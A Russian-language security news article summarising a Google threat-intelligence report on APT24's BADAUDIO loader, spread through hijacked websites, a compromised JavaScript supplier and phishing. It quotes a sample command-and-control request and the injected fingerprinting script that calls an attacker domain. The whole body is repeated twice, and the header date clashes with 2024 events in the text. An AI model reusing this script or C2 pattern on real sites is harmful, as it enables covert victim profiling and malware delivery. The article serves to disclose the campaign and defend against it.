- 22,450
- 46
- 8 Ноя 2022
Как цифровая мафия грабила корпорации через поддельные апдейты.
Команда Google Threat Intelligence Group представила подробный разбор многолетней кибершпионской кампании, связанной с группировкой APT24. По их данным, в течение 3 лет эта команда последовательно распространяет вредоносный загрузчик BADAUDIO, который применяется для закрепления в сетях жертв и дальнейшего развертывания инструментов удалённого управления.
За время наблюдений вектор распространения заметно усложнился. На ранних этапах злоумышленники опирались на массовый взлом легитимных сайтов, превращая их в площадки для установки вредоносного JavaScript. Позже схема расширилась: возникли поставочные атаки через тайваньскую маркетинговую компанию, а также серия фишинговых писем, направленных на конкретных сотрудников разных организаций.
BADAUDIO представляет собой загрузчик на C++, работающий в роли первой стадии. Он устанавливает сетевое соединение с сервером управления, собирает данные о системе и, используя встроенный ключ AES, шифрует эти сведения. После отправки зашифрованного блока в cookie-параметре загрузчик получает полезную нагрузку, расшифровывает её тем же ключом и выполняет в оперативной памяти. В одном из эпизодов такой нагрузкой оказался Cobalt Strike Beacon, однако специалисты подчёркивают, что его использование не является универсальным.
Пример запроса, приведённый GTIG:
<pre><code> GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1 Host: wispy[.]geneva[.]workers[.]dev Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ== User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Connection: Keep-Alive Cache-Control: no-cache </code></pre> Вредонос также может использовать иной формат идентификатора, который вставляется в параметры запроса, чтобы операторы могли отслеживать конкретные заражённые узлы.
Код загрузчика заметно затрудняет анализ благодаря технике выпрямления управления. Эта схема разрушает обычную структуру программы и заменяет её набором разрозненных блоков, выполнение которых определяется центральным управляющим фрагментом. Из-за этого автоматический анализ и реверс-инжиниринг требуют значительно больше времени.
BADAUDIO чаще всего загружается как DLL через подмену порядка поиска библиотек по механизму DLL Search Order Hijacking (MITRE ATT&CK T1574.001). В свежих образцах вредоносная библиотека упакована в зашифрованный архив вместе с BAT, VBS и LNK-файлами, которые автоматизируют копирование легитимного EXE и DLL в пользовательские каталоги, создают запись автозапуска и запускают нелегитимную библиотеку через сайдлоадинг. Такой подход уменьшает количество очевидных признаков компрометации.
Google подтвердила, что в одном из случаев полезная нагрузка представляла собой Cobalt Strike Beacon . В конфигурации маяка нашли watermark, ранее встречавшийся в другой кампании APT24. Это значение формируется на основе файла CobaltStrike.auth и позволяет связывать разные инциденты с одной сборкой инструмента.
Кампания развивается уже несколько лет и включает комбинацию методов: взлом сайтов, поставочные атаки и целевые фишинговые письма. Каждая из веток использует собственную систему фильтрации жертв и проверки окружения.
Первое массовое использование BADAUDIO через взломанные сайты Google зафиксировала в ноябре 2022 года. Было обнаружено свыше 20 ресурсов разной тематики. Во все сайты внедряли модифицированный JavaScript , который включал этап фильтрации по операционной системе и браузеру. В результате цепочка активировалась только для Windows.
Фрагмент JavaScript из отчета GTIG:
<pre><code> $(window).ready(function() {var userAgent = navigator.userAgent;var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;var isMac = userAgent.indexOf('Macintosh') > -1;var isiPhone = userAgent.indexOf('iPhone') > -1;var isFireFox = userAgent.indexOf('Firefox') > -1;if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) { var tag_script = document.createElement("script"); tag_script.type = "text/javascript"; tag_script.src = "https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js"; tag_script.onload = "initFingerprintJS()"; document.body.appendChild(tag_script); if (typeof(callback) !== "undefined") { tag_script.onload = function() {callback(); }; } function callback() { var option = {excludes: { screenResolution: true, availableScreenResolution: true, enumerateDevices: true} }; new Fingerprint2.get(option, function(components) {var values = components.map(function(component) { return component.value;});var murmur = Fingerprint2.x64hash128(values.join(''), 31);var script_tag = document.createElement("script");script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);document.body.appendChild(script_tag); }); }} }); </code></pre> Скрипт собирал характеристики браузера и вычислял хеш по алгоритму MurmurHash3, после чего отправлял идентификатор на домен злоумышленников. Если параметры подходили под требования, пользователь видел ложное окно «обновления» Chrome, предлагавшее загрузить BADAUDIO.
В июле 2024 года APT24 взломала региональную фирму, поставлявшую JavaScript-библиотеки для анализа трафика и вспомогательных функций веб-сайтов. Этот взлом затронул свыше 1000 доменов. Причём в течение года компания пережила несколько повторных компрометаций, что демонстрирует упорство операторов.
В первой версии вредоносный код внедрили в популярную библиотеку с использованием домена-опечатки, имитирующего ресурс CDN (MITRE ATT&CK T1195.001). В другом случае злоумышленники спрятали обфусцированный JavaScript внутри JSON-файла, который затем подгружался и выполнялся через скомпрометированный скрипт. Это позволяло скрывать вредоносный код в файле, который обычно не воспринимается как исполняемый.
Библиотека FingerprintJS2 снова генерировала x64hash128-отпечатки устройств (MITRE ATT&CK T1082). Далее происходила отправка данных методом POST в Base64 (MITRE ATT&CK T1041). Команда управления выдавала ссылку на следующий фрагмент цепочки, который перенаправлял пользователя на страницу загрузки BADAUDIO (MITRE ATT&CK T1105).
Кроме атак через сайты APT24 проводила фишинговые кампании , используя письма от имени благотворительной организации. В других эпизодах злоумышленники распространяли зашифрованные архивы через Google Drive и OneDrive. Почтовая фильтрация Google автоматически отправляла такие письма в раздел «Спам» и тем самым снижала результативность рассылок. Для отслеживания реакции людей злоумышленники встраивали пиксель-трекинг.
Google включила задействованные домены, сайты и файлы в блок-лист Safe Browsing, что защищает пользователей браузеров, использующих эту инфраструктуру. Компания также отправила уведомления пострадавшим организациям, предоставив технические детали и рекомендации по устранению последствий.
В конце отчета приведены индикаторы компрометации: контрольные суммы JavaScript-файлов, хэши бинарников BADAUDIO, адреса серверов управления, домены промежуточной инфраструктуры и watermark Cobalt Strike Beacon. Дополнительно опубликованы YARA-правила, предназначенные для поиска разных версий загрузчика.
Команда Google Threat Intelligence Group представила подробный разбор многолетней кибершпионской кампании, связанной с группировкой APT24. По их данным, в течение 3 лет эта команда последовательно распространяет вредоносный загрузчик BADAUDIO, который применяется для закрепления в сетях жертв и дальнейшего развертывания инструментов удалённого управления.
За время наблюдений вектор распространения заметно усложнился. На ранних этапах злоумышленники опирались на массовый взлом легитимных сайтов, превращая их в площадки для установки вредоносного JavaScript. Позже схема расширилась: возникли поставочные атаки через тайваньскую маркетинговую компанию, а также серия фишинговых писем, направленных на конкретных сотрудников разных организаций.
BADAUDIO представляет собой загрузчик на C++, работающий в роли первой стадии. Он устанавливает сетевое соединение с сервером управления, собирает данные о системе и, используя встроенный ключ AES, шифрует эти сведения. После отправки зашифрованного блока в cookie-параметре загрузчик получает полезную нагрузку, расшифровывает её тем же ключом и выполняет в оперативной памяти. В одном из эпизодов такой нагрузкой оказался Cobalt Strike Beacon, однако специалисты подчёркивают, что его использование не является универсальным.
Пример запроса, приведённый GTIG:
<pre><code> GET https://wispy[.]geneva[.]workers[.]dev/pub/static/img/merged?version=65feddea0367 HTTP/1.1 Host: wispy[.]geneva[.]workers[.]dev Cookie: SSID=0uGjnpPHjOqhpT7PZJHD2WkLAxwHkpxMnKvq96VsYSCIjKKGeBfIKGKpqbRmpr6bBs8hT0ZtzL7/kHc+fyJkIoZ8hDyO8L3V1NFjqOBqFQ== User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Connection: Keep-Alive Cache-Control: no-cache </code></pre> Вредонос также может использовать иной формат идентификатора, который вставляется в параметры запроса, чтобы операторы могли отслеживать конкретные заражённые узлы.
Код загрузчика заметно затрудняет анализ благодаря технике выпрямления управления. Эта схема разрушает обычную структуру программы и заменяет её набором разрозненных блоков, выполнение которых определяется центральным управляющим фрагментом. Из-за этого автоматический анализ и реверс-инжиниринг требуют значительно больше времени.
BADAUDIO чаще всего загружается как DLL через подмену порядка поиска библиотек по механизму DLL Search Order Hijacking (MITRE ATT&CK T1574.001). В свежих образцах вредоносная библиотека упакована в зашифрованный архив вместе с BAT, VBS и LNK-файлами, которые автоматизируют копирование легитимного EXE и DLL в пользовательские каталоги, создают запись автозапуска и запускают нелегитимную библиотеку через сайдлоадинг. Такой подход уменьшает количество очевидных признаков компрометации.
Google подтвердила, что в одном из случаев полезная нагрузка представляла собой Cobalt Strike Beacon . В конфигурации маяка нашли watermark, ранее встречавшийся в другой кампании APT24. Это значение формируется на основе файла CobaltStrike.auth и позволяет связывать разные инциденты с одной сборкой инструмента.
Кампания развивается уже несколько лет и включает комбинацию методов: взлом сайтов, поставочные атаки и целевые фишинговые письма. Каждая из веток использует собственную систему фильтрации жертв и проверки окружения.
Первое массовое использование BADAUDIO через взломанные сайты Google зафиксировала в ноябре 2022 года. Было обнаружено свыше 20 ресурсов разной тематики. Во все сайты внедряли модифицированный JavaScript , который включал этап фильтрации по операционной системе и браузеру. В результате цепочка активировалась только для Windows.
Фрагмент JavaScript из отчета GTIG:
<pre><code> $(window).ready(function() {var userAgent = navigator.userAgent;var isIE = userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1;var isEdge = userAgent.indexOf("Edge") > -1 && !isIE;var isIE11 = userAgent.indexOf('Trident') > -1 && userAgent.indexOf("rv:11.0") > -1;var isMac = userAgent.indexOf('Macintosh') > -1;var isiPhone = userAgent.indexOf('iPhone') > -1;var isFireFox = userAgent.indexOf('Firefox') > -1;if (!isIE && !isEdge && !isIE11 && !isMac && !isiPhone && !isFireFox) { var tag_script = document.createElement("script"); tag_script.type = "text/javascript"; tag_script.src = "https://cdn.jsdelivr.net/npm/@fingerprintjs/fingerprintjs@2/dist/fingerprint2.min.js"; tag_script.onload = "initFingerprintJS()"; document.body.appendChild(tag_script); if (typeof(callback) !== "undefined") { tag_script.onload = function() {callback(); }; } function callback() { var option = {excludes: { screenResolution: true, availableScreenResolution: true, enumerateDevices: true} }; new Fingerprint2.get(option, function(components) {var values = components.map(function(component) { return component.value;});var murmur = Fingerprint2.x64hash128(values.join(''), 31);var script_tag = document.createElement("script");script_tag.setAttribute("src", "https://www[.]twisinbeth[.]com/query.php?id=" + murmur);document.body.appendChild(script_tag); }); }} }); </code></pre> Скрипт собирал характеристики браузера и вычислял хеш по алгоритму MurmurHash3, после чего отправлял идентификатор на домен злоумышленников. Если параметры подходили под требования, пользователь видел ложное окно «обновления» Chrome, предлагавшее загрузить BADAUDIO.
В июле 2024 года APT24 взломала региональную фирму, поставлявшую JavaScript-библиотеки для анализа трафика и вспомогательных функций веб-сайтов. Этот взлом затронул свыше 1000 доменов. Причём в течение года компания пережила несколько повторных компрометаций, что демонстрирует упорство операторов.
В первой версии вредоносный код внедрили в популярную библиотеку с использованием домена-опечатки, имитирующего ресурс CDN (MITRE ATT&CK T1195.001). В другом случае злоумышленники спрятали обфусцированный JavaScript внутри JSON-файла, который затем подгружался и выполнялся через скомпрометированный скрипт. Это позволяло скрывать вредоносный код в файле, который обычно не воспринимается как исполняемый.
Библиотека FingerprintJS2 снова генерировала x64hash128-отпечатки устройств (MITRE ATT&CK T1082). Далее происходила отправка данных методом POST в Base64 (MITRE ATT&CK T1041). Команда управления выдавала ссылку на следующий фрагмент цепочки, который перенаправлял пользователя на страницу загрузки BADAUDIO (MITRE ATT&CK T1105).
Кроме атак через сайты APT24 проводила фишинговые кампании , используя письма от имени благотворительной организации. В других эпизодах злоумышленники распространяли зашифрованные архивы через Google Drive и OneDrive. Почтовая фильтрация Google автоматически отправляла такие письма в раздел «Спам» и тем самым снижала результативность рассылок. Для отслеживания реакции людей злоумышленники встраивали пиксель-трекинг.
Google включила задействованные домены, сайты и файлы в блок-лист Safe Browsing, что защищает пользователей браузеров, использующих эту инфраструктуру. Компания также отправила уведомления пострадавшим организациям, предоставив технические детали и рекомендации по устранению последствий.
В конце отчета приведены индикаторы компрометации: контрольные суммы JavaScript-файлов, хэши бинарников BADAUDIO, адреса серверов управления, домены промежуточной инфраструктуры и watermark Cobalt Strike Beacon. Дополнительно опубликованы YARA-правила, предназначенные для поиска разных версий загрузчика.
- Источник новости
- www.securitylab.ru
